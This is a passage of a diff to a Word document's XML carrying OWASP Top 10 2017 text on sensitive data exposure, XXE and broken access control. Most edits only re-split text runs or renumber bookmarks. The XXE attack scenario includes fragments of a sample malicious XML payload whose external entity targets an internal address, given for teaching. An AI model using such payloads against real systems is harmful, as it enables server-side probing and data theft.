+          <w:t>OWASP Testing Guide:</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t xml:space="preserve"> Identity</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -6371,7 +5952,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="46" w:name="a32017-sensitive-data-exposure"/>
-      <w:bookmarkStart w:id="47" w:name="_Toc496378422"/>
+      <w:bookmarkStart w:id="47" w:name="_Toc496437900"/>
       <w:bookmarkEnd w:id="46"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -6509,10 +6090,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, pa</w:t>
-            </w:r>
-            <w:r>
-              <w:t>rticularly weak password hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data in rest. Both with very varying exploitability.</w:t>
+              <w:t>Over the last few years, this has been the most common impactful attack. The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak passwo</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rd hashing techniques. For data in transit server side weaknesses are mainly easy to detect, but hard for data in rest. Both with very varying exploitability.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6525,10 +6106,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Failure frequently compromises all data that should have been protected. Ty</w:t>
-            </w:r>
-            <w:r>
-              <w:t>pically, this information includes sensitive personal information (PII) data such as health records, credentials, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</w:t>
+              <w:t>Failure frequently compromises all data that should have been protected. Typically, this informat</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ion includes sensitive personal information (PII) data such as health records, credentials, personal data, credit cards, which often requires protection as defined by laws or regulations such as the EU GDPR or local privacy laws.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6541,10 +6122,10 @@
       <w:bookmarkStart w:id="48" w:name="am-i-vulnerable-to-data-exposure"/>
       <w:bookmarkEnd w:id="48"/>
       <w:r>
-        <w:t xml:space="preserve">Am </w:t>
-      </w:r>
-      <w:r>
-        <w:t>I Vulnerable to Data Exposure?</w:t>
+        <w:t>Am I Vulnerable to Data E</w:t>
+      </w:r>
+      <w:r>
+        <w:t>xposure?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6552,13 +6133,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data fa</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">lls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS), or health records laws, such as Portability Act (HIIPA). For all </w:t>
-      </w:r>
-      <w:r>
-        <w:t>such data:</w:t>
+        <w:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's Gen</w:t>
+      </w:r>
+      <w:r>
+        <w:t>eral Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS), or health records laws, such as Portability Act (HIIPA). For all such data:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6570,7 +6148,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Is any data of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous, but from load balancers to web servers or from web servers to back end systems can be problematic.</w:t>
+        <w:t>Is any data</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous, but from load balancers to web servers or from web servers to back end systems can be problematic.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6582,10 +6163,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Is sensitive data stored in c</w:t>
-      </w:r>
-      <w:r>
-        <w:t>lear text, including backups?</w:t>
+        <w:t>Is sensitive data stored in clear text, including b</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ackups?</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -6613,7 +6194,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</w:t>
+        <w:t>Is</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6647,7 +6231,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Do the following, at a minimum and consult the references:</w:t>
+        <w:t>Do the fol</w:t>
+      </w:r>
+      <w:r>
+        <w:t>lowing, at a minimum and consult the references:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6659,13 +6246,12 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Classify data processed, stored or transmitted by a system. Apply controls as per the</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> classification.</w:t>
+        <w:t>Classify data processed, stored or transmitted by a system. Apply controls as per the classification.</w:t>
       </w:r>
       <w:r>
         <w:br/>
+      </w:r>
+      <w:r>
         <w:t>Review the privacy laws or regulations applicable to sensitive data, and protect as per regulatory requirements</w:t>
       </w:r>
     </w:p>
@@ -6678,10 +6264,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncati</w:t>
-      </w:r>
-      <w:r>
-        <w:t>on. Data you don’t retain can’t be stolen.</w:t>
+        <w:t>Don’t store sensitive data unnecessarily. Discard it as soon as possible or use PCI DSS compliant tokenization or even truncation. Data you don’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>t retain can’t be stolen.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6718,10 +6304,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure up-to-date and strong standard alg</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">orithms or ciphers, parameters, protocols and keys are used, and proper key management is in place. Consider using </w:t>
+        <w:t>Ensure up-to-date and strong standard algorithms or cipher</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">s, parameters, protocols and keys are used, and proper key management is in place. Consider using </w:t>
       </w:r>
       <w:hyperlink r:id="rId70">
         <w:r>
@@ -6744,7 +6330,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Ensure passwords are stored with a strong adaptive algorithm appropriate for password protection, such as </w:t>
+        <w:t>Ensure passwords are stored</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with a strong adaptive algorithm appropriate for password protection, such as </w:t>
       </w:r>
       <w:hyperlink r:id="rId71">
         <w:r>
@@ -6802,12 +6391,20 @@
       <w:r>
         <w:t>Disable caching for response that contain sensitive data.</w:t>
       </w:r>
-      <w:r>
-        <w:br/>
-        <w:t>Verify independe</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ntly the effectiveness of your settings.</w:t>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Compact"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="23"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Verify independently the effectiveness of your se</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ttings.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6831,10 +6428,10 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>:  An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL inj</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ection flaw to retrieve credit card numbers in clear text. </w:t>
+        <w:t>:  An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit ca</w:t>
+      </w:r>
+      <w:r>
+        <w:t>rd numbers in clear text. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6848,13 +6445,10 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>: A site doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless ne</w:t>
-      </w:r>
-      <w:r>
-        <w:t>twork), and steals the user's session cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could alter all transported data, e.g. the recipient</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> of a money transfer.</w:t>
+        <w:t>: A site doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's ses</w:t>
+      </w:r>
+      <w:r>
+        <w:t>sion cookie. The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could alter all transported data, e.g. the recipient of a money transfer.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6868,10 +6462,7 @@
         <w:t>Scenario #3</w:t>
       </w:r>
       <w:r>
-        <w:t>: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calcula</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ted hashes.</w:t>
+        <w:t>: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6914,7 +6505,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Application Security Verification Standard - V9, V10, V11</w:t>
+          <w:t>OWASP Applic</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ation Security Verification Standard - V9, V10, V11</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -7137,7 +6734,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="53" w:name="a42017-xml-external-entities-xxe"/>
-      <w:bookmarkStart w:id="54" w:name="_Toc496378423"/>
+      <w:bookmarkStart w:id="54" w:name="_Toc496437901"/>
       <w:bookmarkEnd w:id="53"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -7259,10 +6856,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Attackers who can access web pages or web se</w:t>
-            </w:r>
-            <w:r>
-              <w:t>rvices, particularly SOAP web services, that process XML. Penetration testers should be capable of exploiting XXE once trained. DAST tools require additional manual steps to exploit this issue.</w:t>
+              <w:t xml:space="preserve">Attackers who can access web </w:t>
+            </w:r>
+            <w:r>
+              <w:t>pages or web services, particularly SOAP web services, that process XML. Penetration testers should be capable of exploiting XXE once trained. DAST tools require additional manual steps to exploit this issue.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7275,10 +6872,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>By default, many older XML processors allow specification of a</w:t>
-            </w:r>
-            <w:r>
-              <w:t>n external entity, a URI that is dereferenced and evaluated during XML processing. SAST tools can discover this issue by inspecting dependencies and configuration.</w:t>
+              <w:t>By default, many older XML processors allow spe</w:t>
+            </w:r>
+            <w:r>
+              <w:t>cification of an external entity, a URI that is dereferenced and evaluated during XML processing. SAST tools can discover this issue by inspecting dependencies and configuration.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7291,7 +6888,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>These flaws can be used to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, and other attacks. The business impact depends on the protection needs of all affected applications and data.</w:t>
+              <w:t>These flaws can be used to extract data, execute a remote request from the se</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rver, scan internal systems, perform a denial-of-service attack, and other attacks. The business impact depends on the protection needs of all affected applications and data.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7304,10 +6904,7 @@
       <w:bookmarkStart w:id="55" w:name="am-i-vulnerable-to-xxe"/>
       <w:bookmarkEnd w:id="55"/>
       <w:r>
-        <w:t xml:space="preserve">Am </w:t>
-      </w:r>
-      <w:r>
-        <w:t>I Vulnerable to XXE?</w:t>
+        <w:t>Am I Vulnerable to XXE?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7315,7 +6912,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Applications and in particular XML-based web services or downstream integrations might be vulnerable to attack if:</w:t>
+        <w:t>Applications and in particular XML-based web services or</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> downstream integrations might be vulnerable to attack if:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7327,10 +6927,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Your application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into </w:t>
-      </w:r>
-      <w:r>
-        <w:t>XML documents, which is then parsed by an XML processor</w:t>
+        <w:t>Your application accepts XML directly or XML uploads, especially from untrusted sources, or inserts untrusted data into XML documents, which is then parsed by an XML processor</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7353,10 +6950,10 @@
         </w:r>
       </w:hyperlink>
       <w:r>
-        <w:t xml:space="preserve"> enabled. As the e</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">xact mechanism for disabling DTD processing varies by processor, it is recommended that you consult a reference such as the </w:t>
+        <w:t xml:space="preserve"> enabled. As the exact mechanism for disabling DTD processing varies by pr</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ocessor, it is recommended that you consult a reference such as the </w:t>
       </w:r>
       <w:hyperlink r:id="rId90">
         <w:r>
@@ -7379,7 +6976,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>If your application uses SOAP prior to version 1.2, it is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</w:t>
+        <w:t>If your application uses SOAP prior to version 1.2, it</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> is likely susceptible to XXE attacks if XML entities are being passed to the SOAP framework.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7391,10 +6991,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>SAST tools can help detect XXE in source code, although manual code review is the best alternative in larg</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e, complex apps with many integrations.</w:t>
+        <w:t>SAST tools can help detect XXE in source code, although manual code review is the best alternative in large, complex apps with many integrations.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7424,10 +7021,7 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Developer training is essential to identify and mitigate XXE completely. </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Besides that, preventing XXE requires:</w:t>
+        <w:t>Developer training is essential to identify and mitigate XXE completely. Besides that, preventing XXE requires:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7439,20 +7033,17 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Disable XML external entity and DTD processing in all XML parsers in your application, as per the </w:t>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">isable XML external entity and DTD processing in all XML parsers in your application, as per the </w:t>
       </w:r>
       <w:hyperlink r:id="rId91">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP XXE Preventio</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>n Cheat Sheet</w:t>
+          <w:t>OWASP XXE Prevention Cheat Sheet</w:t>
         </w:r>
       </w:hyperlink>
       <w:r>
@@ -7468,7 +7059,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Implement positive ("white listing") input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</w:t>
+        <w:t>Implement positive ("whit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e listing") input validation, filtering, or sanitization to prevent hostile data within XML documents, headers, or nodes.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7480,10 +7074,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>r similar.</w:t>
+        <w:t>Verify that XML or XSL file upload functionality validates incoming XML using XSD validation or similar.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7495,10 +7086,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Patch or upgrade all the latest XML processors and libraries in use by the app or on the underlying operating system. The use of dependency checkers is critical in managing the risk from necessary libraries and components in not only your app, b</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ut any downstream integrations.</w:t>
+        <w:t>Patch or upgrade all the late</w:t>
+      </w:r>
+      <w:r>
+        <w:t>st XML processors and libraries in use by the app or on the underlying operating system. The use of dependency checkers is critical in managing the risk from necessary libraries and components in not only your app, but any downstream integrations.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7510,7 +7101,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Upgrade SOAP to the latest version.</w:t>
+        <w:t xml:space="preserve">Upgrade </w:t>
+      </w:r>
+      <w:r>
+        <w:t>SOAP to the latest version.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7537,10 +7131,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Numerous public XXE</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> issues have been discovered, including attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies. The easiest way is to upload a malicious XML file, if accepted:</w:t>
+        <w:t xml:space="preserve">Numerous public XXE issues have been discovered, including </w:t>
+      </w:r>
+      <w:r>
+        <w:t>attacking embedded devices. XXE occurs in a lot of unexpected places, including deeply nested dependencies. The easiest way is to upload a malicious XML file, if accepted:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7554,10 +7148,7 @@
         <w:t>Scenario #1</w:t>
       </w:r>
       <w:r>
-        <w:t>: The attacker  attempts to extra</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ct data from the server:</w:t>
+        <w:t>: The attacker  attempts to extract data from the server:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7568,7 +7159,13 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">  &lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</w:t>
+        <w:t xml:space="preserve">  &lt;?xml version</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t>="1.0" encoding="ISO-8859-1"?&gt;</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -7629,7 +7226,13 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">   &lt;!ENTITY xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
+        <w:t xml:space="preserve">   &lt;!ENTITY </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="VerbatimChar"/>
+        </w:rPr>
+        <w:t>xxe SYSTEM "https://192.168.1.1/private" &gt;]&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7707,7 +7310,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Testing Guide - Testing for XML Injection</w:t>
+          <w:t>OWASP Testing Guide - Test</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>ing for XML Injection</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -7811,7 +7420,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="61" w:name="a52017-broken-access-control"/>
-      <w:bookmarkStart w:id="62" w:name="_Toc496378424"/>
+      <w:bookmarkStart w:id="62" w:name="_Toc496437902"/>
       <w:bookmarkEnd w:id="61"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -7877,10 +7486,7 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Imp</w:t>
-            </w:r>
-            <w:r>
-              <w:t>acts</w:t>
+              <w:t>Impacts</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -7989,13 +7595,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>Access control</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limits of the user.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Common access control vulnerabilities include:</w:t>
+        <w:t>Access control enforces policy such that users cannot act outside of their intended permissions. Failures typically lead to unauthorized information disclosure, modification or destruction of all data, or performing a business function outside of the limit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s of the user. Common access control vulnerabilities include:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8019,10 +7622,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Allowing the primary key to be changed to another's users record, such as </w:t>
-      </w:r>
-      <w:r>
-        <w:t>viewing or editing someone else's account.</w:t>
+        <w:t>Allowing the primary key to be changed to another's users re</w:t>
+      </w:r>
+      <w:r>
+        <w:t>cord, such as viewing or editing someone else's account.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8046,10 +7649,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Metadata manipulation, such as replaying or tampering with a JWT access control token or a cookie o</w:t>
-      </w:r>
-      <w:r>
-        <w:t>r hidden field manipulated to elevate privileges.</w:t>
+        <w:t>Metadata manipulation, such as replaying or tampering with a JWT access control token</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> or a cookie or hidden field manipulated to elevate privileges.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8073,10 +7676,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or API not enforcing access controls for POST</w:t>
-      </w:r>
-      <w:r>
-        <w:t>, PUT and DELETE</w:t>
+        <w:t>Force browsing to authenticated pages as an unauthenticated user, or to privileged pages as a standard user or API not enforcing access con</w:t>
+      </w:r>
+      <w:r>
+        <w:t>trols for POST, PUT and DELETE</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8106,7 +7709,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>With the exception of public resources, deny by default.</w:t>
+        <w:t>With the exception of public resources</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, deny by default.</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -8122,10 +7728,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Model access controls should enforce record ownership, rather than accepting that the user can create, read, updat</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e or delete any record.</w:t>
+        <w:t>Model access controls should enforce record ownership, rather than accepting that the user can create, read, update or delete any record.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8137,7 +7740,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Domain access controls are unique to each application, but business limit requirements should be enforced by domain models</w:t>
+        <w:t xml:space="preserve">Domain access </w:t>
+      </w:r>
+      <w:r>
+        <w:t>controls are unique to each application, but business limit requirements should be enforced by domain models</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8149,10 +7755,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Disable web server directory listing, and ensure file metadata such (e.g. .git) is not present within web roo</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ts</w:t>
+        <w:t>Disable web server directory listing, and ensure file metadata such (e.g. .git) is not present within web roots</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8164,7 +7767,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Log access control failures, alert admins when appropriate (e.g. repeated failures)</w:t>
+        <w:t xml:space="preserve">Log access control failures, alert </w:t>
+      </w:r>
+      <w:r>
+        <w:t>admins when appropriate (e.g. repeated failures)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8189,10 +7795,7 @@
       </w:pPr>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Developers and QA staff should include functional access control unit and inte</w:t>
-      </w:r>
-      <w:r>
-        <w:t>gration tests.</w:t>
+        <w:t>Developers and QA staff should include functional access control unit and integration tests.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8202,7 +7805,10 @@
       <w:bookmarkStart w:id="65" w:name="example-attack-scenarios-4"/>
       <w:bookmarkEnd w:id="65"/>
       <w:r>
-        <w:t>Example Attack Scenarios</w:t>
+        <w:t>Example Attack Scenario</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8244,7 +7850,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>An attacker simply modifies the 'acct' parameter in the browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.</w:t>
+        <w:t>An attacker simply modifies the 'acct' parameter in th</w:t>
+      </w:r>
+      <w:r>
+        <w:t>e browser to send whatever account number they want. If not properly verified, the attacker can access any user's account.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8273,10 +7882,7 @@
         <w:t>Scenario #2</w:t>
       </w:r>
       <w:r>
-        <w:t>:  An attacker sim</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ply force browses to target URLs. Admin rights are required for access to the admin page.</w:t>
+        <w:t>:  An attacker simply force browses to target URLs. Admin rights are required for access to the admin page.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8314,10 +7920,10 @@
         <w:pStyle w:val="FirstParagraph"/>
       </w:pPr>
       <w:r>
-        <w:t>If an unauthenticated user can access either page, it’s a flaw. If a non-admin can access th</w:t>
-      </w:r>
-      <w:r>
-        <w:t>e admin page, this is a flaw.</w:t>
+        <w:t>If an unauthenticated user can access either page, it’s a flaw. If a non-a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>dmin can access the admin page, this is a flaw.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8387,13 +7993,13 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>OWASP Testing Guide - Access Contro</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>l</w:t>
+          <w:t>OWASP Testing Gui</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+          </w:rPr>
+          <w:t>de - Access Control</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -8502,13 +8108,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>CWE-6</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>39 Authorization Bypass Through User-Controlled Key</w:t>
+          <w:t>CWE-639 Authorization Bypass Through User-Controlled Key</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
@@ -8534,7 +8134,7 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:bookmarkStart w:id="69" w:name="a62017-security-misconfiguration"/>
-      <w:bookmarkStart w:id="70" w:name="_Toc496378425"/>
+      <w:bookmarkStart w:id="70" w:name="_Toc496437903"/>
       <w:bookmarkEnd w:id="69"/>
       <w:r>
         <w:lastRenderedPageBreak/>
@@ -8566,7 +8166,10 @@
               <w:pStyle w:val="Compact"/>
             </w:pPr>
             <w:r>
-              <w:t>Threat agents/Attack vectors</w:t>
+              <w:t>Threat agen</w:t>
+            </w:r>
+            <w:r>
+              <w:t>ts/Attack vectors</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -8790,7 +8393,10 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">For web applications, does the server not send security directives to client agents (e.g. </w:t>
+        <w:t xml:space="preserve">For web applications, does the server not send security directives to client agents </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(e.g. </w:t>
       </w:r>
       <w:hyperlink r:id="rId107">
         <w:r>
@@ -8813,10 +8419,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Is any of your software out </w:t>
-      </w:r>
-      <w:r>
